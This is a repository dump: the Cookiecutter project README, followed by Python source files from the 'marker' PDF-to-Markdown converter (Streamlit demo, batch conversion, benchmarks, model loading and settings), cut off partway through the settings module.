<h1 align="center"> <img alt="cookiecutter Logo" width="200px" src="https://raw.githubusercontent.com/cookiecutter/cookiecutter/3ac078356adf5a1a72042dfe72ebfa4a9cd5ef38/logo/cookiecutter_medium.png"> </h1> <div align="center"> [![pypi](https://img.shields.io/pypi/v/cookiecutter.svg)](https://pypi.org/project/cookiecutter/) [![python](https://img.shields.io/pypi/pyversions/cookiecutter.svg)](https://pypi.org/project/cookiecutter/) [![Build Status](https://github.com/cookiecutter/cookiecutter/actions/workflows/tests.yml/badge.svg?branch=main)](https://github.com/cookiecutter/cookiecutter/actions) [![codecov](https://codecov.io/gh/cookiecutter/cookiecutter/branch/main/graphs/badge.svg?branch=main)](https://codecov.io/github/cookiecutter/cookiecutter?branch=main) [![discord](https://img.shields.io/badge/Discord-cookiecutter-5865F2?style=flat&logo=discord&logoColor=white)](https://discord.gg/9BrxzPKuEW) [![docs](https://readthedocs.org/projects/cookiecutter/badge/?version=latest)](https://readthedocs.org/projects/cookiecutter/?badge=latest) [![Code Quality](https://img.shields.io/scrutinizer/g/cookiecutter/cookiecutter.svg)](https://scrutinizer-ci.com/g/cookiecutter/cookiecutter/?branch=main) </div> # Cookiecutter Create projects swiftly from **cookiecutters** (project templates) with this command-line utility. Ideal for generating Python package projects and more. - [Documentation](https://cookiecutter.readthedocs.io) - [GitHub](https://github.com/cookiecutter/cookiecutter) - [PyPI](https://pypi.org/project/cookiecutter/) - [License (BSD)](https://github.com/cookiecutter/cookiecutter/blob/main/LICENSE) ## Installation Install cookiecutter using pip package manager: ``` # pipx is strongly recommended. pipx install cookiecutter # If pipx is not an option, # you can install cookiecutter in your Python user directory. python -m pip install --user cookiecutter ``` ## Features - **Cross-Platform:** Supports Windows, Mac, and Linux. - **User-Friendly:** No Python knowledge required. - **Versatile:** Compatible with Python 3.7 to 3.12. - **Multi-Language Support:** Use templates in any language or markup format. ### For Users #### Quick Start The recommended way to use Cookiecutter as a command line utility is to run it with [`pipx`](https://pypa.github.io/pipx/), which can be installed with `pip install pipx`, but if you plan to use Cookiecutter programmatically, please run `pip install cookiecutter`. **Use a GitHub template** ```bash # You'll be prompted to enter values. # Then it'll create your Python package in the current working directory, # based on those values. # For the sake of brevity, repos on GitHub can just use the 'gh' prefix $ pipx run cookiecutter gh:audreyfeldroy/cookiecutter-pypackage ``` **Use a local template** ```bash $ pipx run cookiecutter cookiecutter-pypackage/ ``` **Use it from Python** ```py from cookiecutter.main import cookiecutter # Create project from the cookiecutter-pypackage/ template cookiecutter('cookiecutter-pypackage/') # Create project from the cookiecutter-pypackage.git repo template cookiecutter('gh:audreyfeldroy//cookiecutter-pypackage.git') ``` #### Detailed Usage - Generate projects from local or remote templates. - Customize projects with `cookiecutter.json` prompts. - Utilize pre-prompt, pre- and post-generate hooks. [Learn More](https://cookiecutter.readthedocs.io/en/latest/usage.html) ### For Template Creators - Utilize unlimited directory nesting. - Employ Jinja2 for all templating needs. - Define template variables easily with `cookiecutter.json`. [Learn More](https://cookiecutter.readthedocs.io/en/latest/tutorials/) ## Available Templates Discover a variety of ready-to-use templates on [GitHub](https://github.com/search?q=cookiecutter&type=Repositories). ### Special Templates - [cookiecutter-pypackage](https://github.com/audreyfeldroy/cookiecutter-pypackage) - [cookiecutter-django](https://github.com/pydanny/cookiecutter-django) - [cookiecutter-pytest-plugin](https://github.com/pytest-dev/cookiecutter-pytest-plugin) - [cookiecutter-plone-starter](https://github.com/collective/cookiecutter-plone-starter) ## Community Join the community, contribute, or seek assistance. - [Troubleshooting Guide](https://cookiecutter.readthedocs.io/en/latest/troubleshooting.html) - [Stack Overflow](https://stackoverflow.com/questions/tagged/cookiecutter) - [Discord](https://discord.gg/9BrxzPKuEW) - [File an Issue](https://github.com/cookiecutter/cookiecutter/issues?q=is%3Aopen) - [Contributors](AUTHORS.md) - [Contribution Guide](CONTRIBUTING.md) ### Support - Star us on [GitHub](https://github.com/cookiecutter/cookiecutter). - Stay tuned for upcoming support options. ### Feedback We value your feedback. Share your criticisms or complaints constructively to help us improve. - [File an Issue](https://github.com/cookiecutter/cookiecutter/issues?q=is%3Aopen) ### Waiting for a Response? - Be patient and consider reaching out to the community for assistance. - For urgent matters, contact [@audreyfeldroy](https://github.com/audreyfeldroy) for consultation or custom development. ## Code of Conduct Adhere to the [PyPA Code of Conduct](https://www.pypa.io/en/latest/code-of-conduct/) during all interactions in the project's ecosystem. ## Acknowledgements Created and led by [Audrey Roy Greenfeld](https://github.com/audreyfeldroy), supported by a dedicated team of maintainers and contributors.
marker
6534333c6a53e023152d85d76d28563977c6ccfc
File: marker_app.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" os.environ["IN_STREAMLIT"] = "true" import base64 import io import re import tempfile from typing import List, Any, Dict import pypdfium2 import streamlit as st from marker.convert import convert_single_pdf from marker.models import load_all_models from surya.languages import CODE_TO_LANGUAGE @st.cache_resource() def load_models(): return load_all_models() def convert_pdf(fname: str, langs: List[str] | None, max_pages: int | None, ocr_all_pages: bool) -> (str, Dict[str, Any], dict): full_text, images, out_meta = convert_single_pdf(fname, model_lst, max_pages=max_pages, langs=langs, ocr_all_pages=ocr_all_pages) return full_text, images, out_meta def open_pdf(pdf_file): stream = io.BytesIO(pdf_file.getvalue()) return pypdfium2.PdfDocument(stream) def img_to_html(img, img_alt): img_bytes = io.BytesIO() img.save(img_bytes, format="PNG") img_bytes = img_bytes.getvalue() encoded = base64.b64encode(img_bytes).decode() img_html = f'<img src="data:image/png;base64,{encoded}" alt="{img_alt}" style="max-width: 100%;">' return img_html def markdown_insert_images(markdown, images): image_tags = re.findall(r'(!\[(?P<image_title>[^\]]+)\]\((?P<image_path>[^\)"\s]+)\s*([^\)]*)\))', markdown) for image in image_tags: image_markdown = image[0] image_alt = image[1] image_path = image[2] if image_path in images: markdown = markdown.replace(image_markdown, img_to_html(images[image_path], image_alt)) return markdown @st.cache_data() def get_page_image(pdf_file, page_num, dpi=96): doc = open_pdf(pdf_file) renderer = doc.render( pypdfium2.PdfBitmap.to_pil, page_indices=[page_num - 1], scale=dpi / 72, ) png = list(renderer)[0] png_image = png.convert("RGB") return png_image @st.cache_data() def page_count(pdf_file): doc = open_pdf(pdf_file) return len(doc) st.set_page_config(layout="wide") col1, col2 = st.columns([.5, .5]) model_lst = load_models() st.markdown(""" # Marker Demo This app will let you try marker, a PDF -> Markdown converter. It works with any languages, and extracts images, tables, equations, etc. Find the project [here](https://github.com/VikParuchuri/marker). """) in_file = st.sidebar.file_uploader("PDF file:", type=["pdf"]) languages = st.sidebar.multiselect("Languages", sorted(list(CODE_TO_LANGUAGE.values())), default=[], max_selections=4, help="Select the languages in the pdf (if known) to improve OCR accuracy. Optional.") max_pages = st.sidebar.number_input("Max pages to parse", min_value=1, value=10, help="Optional maximum number of pages to convert") ocr_all_pages = st.sidebar.checkbox("Force OCR on all pages", help="Force OCR on all pages, even if they are images", value=False) if in_file is None: st.stop() filetype = in_file.type with col1: page_count = page_count(in_file) page_number = st.number_input(f"Page number out of {page_count}:", min_value=1, value=1, max_value=page_count) pil_image = get_page_image(in_file, page_number) st.image(pil_image, caption="PDF file (preview)", use_column_width=True) run_marker = st.sidebar.button("Run Marker") if not run_marker: st.stop() # Run Marker with tempfile.NamedTemporaryFile(suffix=".pdf") as temp_pdf: temp_pdf.write(in_file.getvalue()) temp_pdf.seek(0) filename = temp_pdf.name md_text, images, out_meta = convert_pdf(filename, languages, max_pages, ocr_all_pages) md_text = markdown_insert_images(md_text, images) with col2: st.markdown(md_text, unsafe_allow_html=True) File: run_marker_app.py import argparse import subprocess import os def run_app(): cur_dir = os.path.dirname(os.path.abspath(__file__)) app_path = os.path.join(cur_dir, "marker_app.py") cmd = ["streamlit", "run", app_path] subprocess.run(cmd, env={**os.environ, "IN_STREAMLIT": "true"}) if __name__ == "__main__": run_app() File: convert.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS os.environ["IN_STREAMLIT"] = "true" # Avoid multiprocessing inside surya os.environ["PDFTEXT_CPU_WORKERS"] = "1" # Avoid multiprocessing inside pdftext import pypdfium2 # Needs to be at the top to avoid warnings import argparse import torch.multiprocessing as mp from tqdm import tqdm import math from marker.convert import convert_single_pdf from marker.output import markdown_exists, save_markdown from marker.pdf.utils import find_filetype from marker.pdf.extract_text import get_length_of_text from marker.models import load_all_models from marker.settings import settings from marker.logger import configure_logging import traceback import json configure_logging() def worker_init(shared_model): if shared_model is None: shared_model = load_all_models() global model_refs model_refs = shared_model def worker_exit(): global model_refs del model_refs def process_single_pdf(args): filepath, out_folder, metadata, min_length = args fname = os.path.basename(filepath) if markdown_exists(out_folder, fname): return try: # Skip trying to convert files that don't have a lot of embedded text # This can indicate that they were scanned, and not OCRed properly # Usually these files are not recent/high-quality if min_length: filetype = find_filetype(filepath) if filetype == "other": return 0 length = get_length_of_text(filepath) if length < min_length: return full_text, images, out_metadata = convert_single_pdf(filepath, model_refs, metadata=metadata) if len(full_text.strip()) > 0: save_markdown(out_folder, fname, full_text, images, out_metadata) else: print(f"Empty file: {filepath}. Could not convert.") except Exception as e: print(f"Error converting {filepath}: {e}") print(traceback.format_exc()) def main(): parser = argparse.ArgumentParser(description="Convert multiple pdfs to markdown.") parser.add_argument("in_folder", help="Input folder with pdfs.") parser.add_argument("out_folder", help="Output folder") parser.add_argument("--chunk_idx", type=int, default=0, help="Chunk index to convert") parser.add_argument("--num_chunks", type=int, default=1, help="Number of chunks being processed in parallel") parser.add_argument("--max", type=int, default=None, help="Maximum number of pdfs to convert") parser.add_argument("--workers", type=int, default=5, help="Number of worker processes to use. Peak VRAM usage per process is 5GB, but avg is closer to 3.5GB.") parser.add_argument("--metadata_file", type=str, default=None, help="Metadata json file to use for languages") parser.add_argument("--min_length", type=int, default=None, help="Minimum length of pdf to convert") args = parser.parse_args() in_folder = os.path.abspath(args.in_folder) out_folder = os.path.abspath(args.out_folder) files = [os.path.join(in_folder, f) for f in os.listdir(in_folder)] files = [f for f in files if os.path.isfile(f)] os.makedirs(out_folder, exist_ok=True) # Handle chunks if we're processing in parallel # Ensure we get all files into a chunk chunk_size = math.ceil(len(files) / args.num_chunks) start_idx = args.chunk_idx * chunk_size end_idx = start_idx + chunk_size files_to_convert = files[start_idx:end_idx] # Limit files converted if needed if args.max: files_to_convert = files_to_convert[:args.max] metadata = {} if args.metadata_file: metadata_file = os.path.abspath(args.metadata_file) with open(metadata_file, "r") as f: metadata = json.load(f) total_processes = min(len(files_to_convert), args.workers) try: mp.set_start_method('spawn') # Required for CUDA, forkserver doesn't work except RuntimeError: raise RuntimeError("Set start method to spawn twice. This may be a temporary issue with the script. Please try running it again.") if settings.TORCH_DEVICE == "mps" or settings.TORCH_DEVICE_MODEL == "mps": print("Cannot use MPS with torch multiprocessing share_memory. This will make things less memory efficient. If you want to share memory, you have to use CUDA or CPU. Set the TORCH_DEVICE environment variable to change the device.") model_lst = None else: model_lst = load_all_models() for model in model_lst: if model is None: continue model.share_memory() print(f"Converting {len(files_to_convert)} pdfs in chunk {args.chunk_idx + 1}/{args.num_chunks} with {total_processes} processes, and storing in {out_folder}") task_args = [(f, out_folder, metadata.get(os.path.basename(f)), args.min_length) for f in files_to_convert] with mp.Pool(processes=total_processes, initializer=worker_init, initargs=(model_lst,)) as pool: list(tqdm(pool.imap(process_single_pdf, task_args), total=len(task_args), desc="Processing PDFs", unit="pdf")) pool._worker_handler.terminate = worker_exit # Delete all CUDA tensors del model_lst if __name__ == "__main__": main() File: chunk_convert.py import argparse import subprocess import pkg_resources def main(): parser = argparse.ArgumentParser(description="Convert a folder of PDFs to a folder of markdown files in chunks.") parser.add_argument("in_folder", help="Input folder with pdfs.") parser.add_argument("out_folder", help="Output folder") args = parser.parse_args() script_path = pkg_resources.resource_filename(__name__, 'chunk_convert.sh') # Construct the command cmd = f"{script_path} {args.in_folder} {args.out_folder}" # Execute the shell script subprocess.run(cmd, shell=True, check=True) if __name__ == "__main__": main() File: convert_single.py import time import pypdfium2 # Needs to be at the top to avoid warnings import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS import argparse from marker.convert import convert_single_pdf from marker.logger import configure_logging from marker.models import load_all_models from marker.output import save_markdown configure_logging() def main(): parser = argparse.ArgumentParser() parser.add_argument("filename", help="PDF file to parse") parser.add_argument("output", help="Output base folder path") parser.add_argument("--max_pages", type=int, default=None, help="Maximum number of pages to parse") parser.add_argument("--start_page", type=int, default=None, help="Page to start processing at") parser.add_argument("--langs", type=str, help="Optional languages to use for OCR, comma separated", default=None) parser.add_argument("--batch_multiplier", type=int, default=2, help="How much to increase batch sizes") parser.add_argument("--debug", action="store_true", help="Enable debug logging", default=False) parser.add_argument("--ocr_all_pages", action="store_true", help="Force OCR on all pages", default=False) args = parser.parse_args() langs = args.langs.split(",") if args.langs else None fname = args.filename model_lst = load_all_models() start = time.time() full_text, images, out_meta = convert_single_pdf(fname, model_lst, max_pages=args.max_pages, langs=langs, batch_multiplier=args.batch_multiplier, start_page=args.start_page, ocr_all_pages=args.ocr_all_pages) fname = os.path.basename(fname) subfolder_path = save_markdown(args.output, fname, full_text, images, out_meta) print(f"Saved markdown to the {subfolder_path} folder") if args.debug: print(f"Total time: {time.time() - start}") if __name__ == "__main__": main() File: benchmarks/overall.py import argparse import tempfile import time from collections import defaultdict from tqdm import tqdm import pypdfium2 as pdfium from marker.convert import convert_single_pdf from marker.logger import configure_logging from marker.models import load_all_models from marker.benchmark.scoring import score_text from marker.pdf.extract_text import naive_get_text import json import os import subprocess import shutil from tabulate import tabulate import torch configure_logging() def start_memory_profiling(): torch.cuda.memory._record_memory_history( max_entries=100000 ) def stop_memory_profiling(memory_file): try: torch.cuda.memory._dump_snapshot(memory_file) except Exception as e: logger.error(f"Failed to capture memory snapshot {e}") # Stop recording memory snapshot history. torch.cuda.memory._record_memory_history(enabled=None) def nougat_prediction(pdf_filename, batch_size=1): out_dir = tempfile.mkdtemp() subprocess.run(["nougat", pdf_filename, "-o", out_dir, "--no-skipping", "--recompute", "--batchsize", str(batch_size)], check=True) md_file = os.listdir(out_dir)[0] with open(os.path.join(out_dir, md_file), "r") as f: data = f.read() shutil.rmtree(out_dir) return data def main(): parser = argparse.ArgumentParser(description="Benchmark PDF to MD conversion. Needs source pdfs, and a refernece folder with the correct markdown.") parser.add_argument("in_folder", help="Input PDF files") parser.add_argument("reference_folder", help="Reference folder with reference markdown files") parser.add_argument("out_file", help="Output filename") parser.add_argument("--nougat", action="store_true", help="Run nougat and compare", default=False) # Nougat batch size 1 uses about as much VRAM as default marker settings parser.add_argument("--marker_batch_multiplier", type=int, default=1, help="Batch size multiplier to use for marker when making predictions.") parser.add_argument("--nougat_batch_size", type=int, default=1, help="Batch size to use for nougat when making predictions.") parser.add_argument("--md_out_path", type=str, default=None, help="Output path for generated markdown files") parser.add_argument("--profile_memory", action="store_true", help="Profile memory usage", default=False) args = parser.parse_args() methods = ["marker"] if args.nougat: methods.append("nougat") if args.profile_memory: start_memory_profiling() model_lst = load_all_models() if args.profile_memory: stop_memory_profiling("model_load.pickle") scores = defaultdict(dict) benchmark_files = os.listdir(args.in_folder) benchmark_files = [b for b in benchmark_files if b.endswith(".pdf")] times = defaultdict(dict) pages = defaultdict(int) for idx, fname in tqdm(enumerate(benchmark_files)): md_filename = fname.rsplit(".", 1)[0] + ".md" reference_filename = os.path.join(args.reference_folder, md_filename) with open(reference_filename, "r", encoding="utf-8") as f: reference = f.read() pdf_filename = os.path.join(args.in_folder, fname) doc = pdfium.PdfDocument(pdf_filename) pages[fname] = len(doc) for method in methods: start = time.time() if method == "marker": if args.profile_memory: start_memory_profiling() full_text, _, out_meta = convert_single_pdf(pdf_filename, model_lst, batch_multiplier=args.marker_batch_multiplier) if args.profile_memory: stop_memory_profiling(f"marker_memory_{idx}.pickle") elif method == "nougat": full_text = nougat_prediction(pdf_filename, batch_size=args.nougat_batch_size) elif method == "naive": full_text = naive_get_text(doc) else: raise ValueError(f"Unknown method {method}") times[method][fname] = time.time() - start score = score_text(full_text, reference) scores[method][fname] = score if args.md_out_path: md_out_filename = f"{method}_{md_filename}" with open(os.path.join(args.md_out_path, md_out_filename), "w+") as f: f.write(full_text) total_pages = sum(pages.values()) with open(args.out_file, "w+") as f: write_data = defaultdict(dict) for method in methods: total_time = sum(times[method].values()) file_stats = { fname: { "time": times[method][fname], "score": scores[method][fname], "pages": pages[fname] } for fname in benchmark_files } write_data[method] = { "files": file_stats, "avg_score": sum(scores[method].values()) / len(scores[method]), "time_per_page": total_time / total_pages, "time_per_doc": total_time / len(scores[method]) } json.dump(write_data, f, indent=4) summary_table = [] score_table = [] score_headers = benchmark_files for method in methods: summary_table.append([method, write_data[method]["avg_score"], write_data[method]["time_per_page"], write_data[method]["time_per_doc"]]) score_table.append([method, *[write_data[method]["files"][h]["score"] for h in score_headers]]) print(tabulate(summary_table, headers=["Method", "Average Score", "Time per page", "Time per document"])) print("") print("Scores by file") print(tabulate(score_table, headers=["Method", *score_headers])) if __name__ == "__main__": main() File: benchmarks/table.py import argparse import json import datasets from surya.schema import LayoutResult, LayoutBox from tqdm import tqdm from marker.benchmark.table import score_table from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.tables.table import format_tables def main(): parser = argparse.ArgumentParser(description="Benchmark table conversion.") parser.add_argument("out_file", help="Output filename for results") parser.add_argument("--dataset", type=str, help="Dataset to use", default="vikp/table_bench") args = parser.parse_args() ds = datasets.load_dataset(args.dataset, split="train") results = [] for i in tqdm(range(len(ds)), desc="Evaluating tables"): row = ds[i] marker_page = Page(**json.loads(row["marker_page"])) table_bbox = row["table_bbox"] gpt4_table = json.loads(row["gpt_4_table"])["markdown_table"] # Counterclockwise polygon from top left table_poly = [ [table_bbox[0], table_bbox[1]], [table_bbox[2], table_bbox[1]], [table_bbox[2], table_bbox[3]], [table_bbox[0], table_bbox[3]], ] # Remove all other tables from the layout results layout_result = LayoutResult( bboxes=[ LayoutBox( label="Table", polygon=table_poly ) ], segmentation_map="", image_bbox=marker_page.text_lines.image_bbox ) marker_page.layout = layout_result format_tables([marker_page]) table_blocks = [block for block in marker_page.blocks if block.block_type == "Table"] if len(table_blocks) != 1: continue table_block = table_blocks[0] table_md = table_block.lines[0].spans[0].text results.append({ "score": score_table(table_md, gpt4_table), "arxiv_id": row["arxiv_id"], "page_idx": row["page_idx"], "marker_table": table_md, "gpt4_table": gpt4_table, "table_bbox": table_bbox }) avg_score = sum([r["score"] for r in results]) / len(results) print(f"Evaluated {len(results)} tables, average score is {avg_score}.") with open(args.out_file, "w+") as f: json.dump(results, f, indent=2) if __name__ == "__main__": main() File: scripts/verify_benchmark_scores.py import json import argparse def verify_scores(file_path): with open(file_path, 'r') as file: data = json.load(file) multicolcnn_score = data["marker"]["files"]["multicolcnn.pdf"]["score"] switch_trans_score = data["marker"]["files"]["switch_trans.pdf"]["score"] if multicolcnn_score <= 0.37 or switch_trans_score <= 0.4: raise ValueError("One or more scores are below the required threshold of 0.4") def verify_table_scores(file_path): with open(file_path, 'r') as file: data = json.load(file) avg = sum([r["score"] for r in data]) / len(data) if avg < 0.7: raise ValueError("Average score is below the required threshold of 0.7") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Verify benchmark scores") parser.add_argument("file_path", type=str, help="Path to the json file") parser.add_argument("--type", type=str, help="Type of file to verify", default="marker") args = parser.parse_args() if args.type == "marker": verify_scores(args.file_path) elif args.type == "table": verify_table_scores(args.file_path) File: marker/models.py import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS from marker.postprocessors.editor import load_editing_model from surya.model.detection.model import load_model as load_detection_model, load_processor as load_detection_processor from texify.model.model import load_model as load_texify_model from texify.model.processor import load_processor as load_texify_processor from marker.settings import settings from surya.model.recognition.model import load_model as load_recognition_model from surya.model.recognition.processor import load_processor as load_recognition_processor from surya.model.ordering.model import load_model as load_order_model from surya.model.ordering.processor import load_processor as load_order_processor def setup_recognition_model(device=None, dtype=None): if device: rec_model = load_recognition_model(device=device, dtype=dtype) else: rec_model = load_recognition_model() rec_processor = load_recognition_processor() rec_model.processor = rec_processor return rec_model def setup_detection_model(device=None, dtype=None): if device: model = load_detection_model(device=device, dtype=dtype) else: model = load_detection_model() processor = load_detection_processor() model.processor = processor return model def setup_texify_model(device=None, dtype=None): if device: texify_model = load_texify_model(checkpoint=settings.TEXIFY_MODEL_NAME, device=device, dtype=dtype) else: texify_model = load_texify_model(checkpoint=settings.TEXIFY_MODEL_NAME, device=settings.TORCH_DEVICE_MODEL, dtype=settings.TEXIFY_DTYPE) texify_processor = load_texify_processor() texify_model.processor = texify_processor return texify_model def setup_layout_model(device=None, dtype=None): if device: model = load_detection_model(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT, device=device, dtype=dtype) else: model = load_detection_model(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT) processor = load_detection_processor(checkpoint=settings.LAYOUT_MODEL_CHECKPOINT) model.processor = processor return model def setup_order_model(device=None, dtype=None): if device: model = load_order_model(device=device, dtype=dtype) else: model = load_order_model() processor = load_order_processor() model.processor = processor return model def load_all_models(device=None, dtype=None, force_load_ocr=False): if device is not None: assert dtype is not None, "Must provide dtype if device is provided" # langs is optional list of languages to prune from recognition MoE model detection = setup_detection_model(device, dtype) layout = setup_layout_model(device, dtype) order = setup_order_model(device, dtype) edit = load_editing_model(device, dtype) # Only load recognition model if we'll need it for all pdfs ocr = setup_recognition_model(device, dtype) texify = setup_texify_model(device, dtype) model_lst = [texify, layout, order, edit, detection, ocr] return model_lst File: marker/convert.py import warnings warnings.filterwarnings("ignore", category=UserWarning) # Filter torch pytree user warnings import os os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" # For some reason, transformers decided to use .isin for a simple op, which is not supported on MPS import pypdfium2 as pdfium # Needs to be at the top to avoid warnings from PIL import Image from marker.utils import flush_cuda_memory from marker.tables.table import format_tables from marker.debug.data import dump_bbox_debug_data from marker.layout.layout import surya_layout, annotate_block_types from marker.layout.order import surya_order, sort_blocks_in_reading_order from marker.ocr.lang import replace_langs_with_codes, validate_langs from marker.ocr.detection import surya_detection from marker.ocr.recognition import run_ocr from marker.pdf.extract_text import get_text_blocks from marker.cleaners.headers import filter_header_footer, filter_common_titles from marker.equations.equations import replace_equations from marker.pdf.utils import find_filetype from marker.postprocessors.editor import edit_full_text from marker.cleaners.code import identify_code_blocks, indent_blocks from marker.cleaners.bullets import replace_bullets from marker.cleaners.headings import split_heading_blocks from marker.cleaners.fontstyle import find_bold_italic from marker.postprocessors.markdown import merge_spans, merge_lines, get_full_text from marker.cleaners.text import cleanup_text from marker.images.extract import extract_images from marker.images.save import images_to_dict from typing import List, Dict, Tuple, Optional from marker.settings import settings def convert_single_pdf( fname: str, model_lst: List, max_pages: int = None, start_page: int = None, metadata: Optional[Dict] = None, langs: Optional[List[str]] = None, batch_multiplier: int = 1, ocr_all_pages: bool = False ) -> Tuple[str, Dict[str, Image.Image], Dict]: ocr_all_pages = ocr_all_pages or settings.OCR_ALL_PAGES if metadata: langs = metadata.get("languages", langs) langs = replace_langs_with_codes(langs) validate_langs(langs) # Find the filetype filetype = find_filetype(fname) # Setup output metadata out_meta = { "languages": langs, "filetype": filetype, } if filetype == "other": # We can't process this file return "", {}, out_meta # Get initial text blocks from the pdf doc = pdfium.PdfDocument(fname) pages, toc = get_text_blocks( doc, fname, max_pages=max_pages, start_page=start_page ) out_meta.update({ "toc": toc, "pages": len(pages), }) # Trim pages from doc to align with start page if start_page: for page_idx in range(start_page): doc.del_page(0) # Unpack models from list texify_model, layout_model, order_model, edit_model, detection_model, ocr_model = model_lst # Identify text lines on pages surya_detection(doc, pages, detection_model, batch_multiplier=batch_multiplier) flush_cuda_memory() # OCR pages as needed pages, ocr_stats = run_ocr(doc, pages, langs, ocr_model, batch_multiplier=batch_multiplier, ocr_all_pages=ocr_all_pages) flush_cuda_memory() out_meta["ocr_stats"] = ocr_stats if len([b for p in pages for b in p.blocks]) == 0: print(f"Could not extract any text blocks for {fname}") return "", {}, out_meta surya_layout(doc, pages, layout_model, batch_multiplier=batch_multiplier) flush_cuda_memory() # Find headers and footers bad_span_ids = filter_header_footer(pages) out_meta["block_stats"] = {"header_footer": len(bad_span_ids)} # Add block types in annotate_block_types(pages) # Dump debug data if flags are set dump_bbox_debug_data(doc, fname, pages) # Find reading order for blocks # Sort blocks by reading order surya_order(doc, pages, order_model, batch_multiplier=batch_multiplier) sort_blocks_in_reading_order(pages) flush_cuda_memory() # Fix code blocks code_block_count = identify_code_blocks(pages) out_meta["block_stats"]["code"] = code_block_count indent_blocks(pages) # Fix table blocks table_count = format_tables(pages) out_meta["block_stats"]["table"] = table_count for page in pages: for block in page.blocks: block.filter_spans(bad_span_ids) block.filter_bad_span_types() filtered, eq_stats = replace_equations( doc, pages, texify_model, batch_multiplier=batch_multiplier ) flush_cuda_memory() out_meta["block_stats"]["equations"] = eq_stats # Extract images and figures if settings.EXTRACT_IMAGES: extract_images(doc, pages) # Split out headers split_heading_blocks(pages) find_bold_italic(pages) # Copy to avoid changing original data merged_lines = merge_spans(filtered) text_blocks = merge_lines(merged_lines) text_blocks = filter_common_titles(text_blocks) full_text = get_full_text(text_blocks) # Handle empty blocks being joined full_text = cleanup_text(full_text) # Replace bullet characters with a - full_text = replace_bullets(full_text) # Postprocess text with editor model full_text, edit_stats = edit_full_text( full_text, edit_model, batch_multiplier=batch_multiplier ) flush_cuda_memory() out_meta["postprocess_stats"] = {"edit": edit_stats} doc_images = images_to_dict(pages) return full_text, doc_images, out_meta File: marker/logger.py import logging import warnings def configure_logging(): logging.basicConfig(level=logging.WARNING) logging.getLogger('pdfminer').setLevel(logging.ERROR) logging.getLogger('PIL').setLevel(logging.ERROR) logging.getLogger('fitz').setLevel(logging.ERROR) logging.getLogger('ocrmypdf').setLevel(logging.ERROR) warnings.simplefilter(action='ignore', category=FutureWarning) File: marker/utils.py import torch from marker.settings import settings def flush_cuda_memory(): if settings.TORCH_DEVICE_MODEL == "cuda": torch.cuda.empty_cache() File: marker/settings.py from typing import Optional, List, Dict, Literal from dotenv import find_dotenv from pydantic import computed_field from pydantic_settings import BaseSettings import torch class Settings(BaseSettings): # General TORCH_DEVICE: Optional[str] = None # Note: MPS device does not work for text detection, and will default to CPU IMAGE_DPI: int = 96 # DPI to render images pulled from pdf at EXTRACT_IMAGES: bool = True # Extract images from pdfs and save them PAGINATE_OUTPUT: bool = False # Paginate output markdown @computed_field @property def TORCH_DEVICE_MODEL(self) -> str: if self.TORCH_DEVICE is not None: return self.TORCH_DEVICE if torch.cuda.is_available(): return "cuda" if torch.backends.mps.is_available(): return "mps" return "cpu" DEFAULT_LANG: str = "English" # Default language we assume files to be in, should be one of the keys in TESSERACT_LANGUAGES SUPPORTED_FILETYPES: Dict = { "application/pdf": "pdf", } # Text extraction PDFTEXT_CPU_WORKERS: int = 4 # How many CPU workers to use for pdf text extraction # Text line Detection DETECTOR_BATCH_SIZE: Optional[int] = None # Defaults to 6 for CPU, 12 otherwise SURYA_DETECTOR_DPI: int = 96 DETECTOR_POSTPROCESSING_CPU_WORKERS: int = 4 # OCR INVALID_CHARS: List[str] = [chr(0xfffd), "�"] OCR_ENGINE: Optional[Literal["surya", "ocrmypdf"]] = "surya" # Which OCR engine to use, either "surya" or "ocrmypdf". Defaults to "ocrmypdf" on CPU, "surya" on GPU. OCR_ALL_PAGES: bool = False # Run OCR on every page even if text can be extracted ## Surya SURYA_OCR_DPI: int = 96 RECOGNITION_BATCH_SIZE: Optional[int] = None # Batch size for surya OCR defaults to 64 for cuda, 32 otherwise ## Tesseract OCR_PARALLEL_WORKERS: int = 2 # How many CPU workers to use for OCR TESSERACT_TIMEOUT: int = 20 # When to give up on OCR TESSDATA_PREFIX: str = "" # Texify model TEXIFY_MODEL_MAX: int = 384 # Max inference length for texify TEXIFY_TOKEN_BUFFER: int = 256 # Number of tokens to buffer above max for texify TEXIFY_DPI: int = 96 # DPI to render images at TEXIFY_BATCH_SIZE: Optional[int] = None # Defaults to 6 for cuda, 12 otherwise TEXIFY_MODEL_NAME: str = "vikp/texify" # Layout model SURYA_LAYOUT_DPI: int = 96 BAD_SPAN_TYPES: List[str] = ["Page-footer", "Page-header", "Picture"] # You can add "Caption" and "Footnote" here to get rid of those elements LAYOUT_MODEL_CHECKPOINT: str = "vikp/surya_layout3" BBOX_INTERSECTION_THRESH: float = 0.7 # How much the layout and pdf bboxes need to overlap to be the same TABLE_INTERSECTION_THRESH: float = 0.7 LAYOUT_BATCH_SIZE: Optional[int] = None # Defaults to 12 for cuda, 6 otherwise # Ordering model SURYA_ORDER_DPI: int = 96 ORDER_BATCH_SIZE: Optional[int] = None # Defaults to 12 for cuda, 6 otherwise ORDER_MAX_BBOXES: int = 255 # Final editing model EDITOR_BATCH_SIZE: Optional[int] = None # Defaults to 6 for cuda, 12 otherwise EDITOR_MAX_LENGTH: int = 1024 EDITOR_MODEL_NAME: str = "vikp/pdf_postprocessor_t5" ENABLE_EDITOR_MODEL: bool = False # The editor model can create false positives EDITOR_CUTOFF_THRESH: float = 0.9 # Ignore predictions below this probability # Debug DEBUG: bool = False # Enable debug logging DEBUG_DATA_FOLDER: Optional[str] = None DEBUG_LEVEL: int = 0 # 0 to 2, 2 means log everything @computed_field @property def CUDA(self) -> bool: return "cuda" in self.TORCH_DEVICE_MODEL @computed_field @property def MODEL_DTYPE(self) -> torch.dtype: if self.TORCH_DEVICE_MODEL == "cuda": return torch.bfloat16 else: return torch.float32 @computed_field @property def 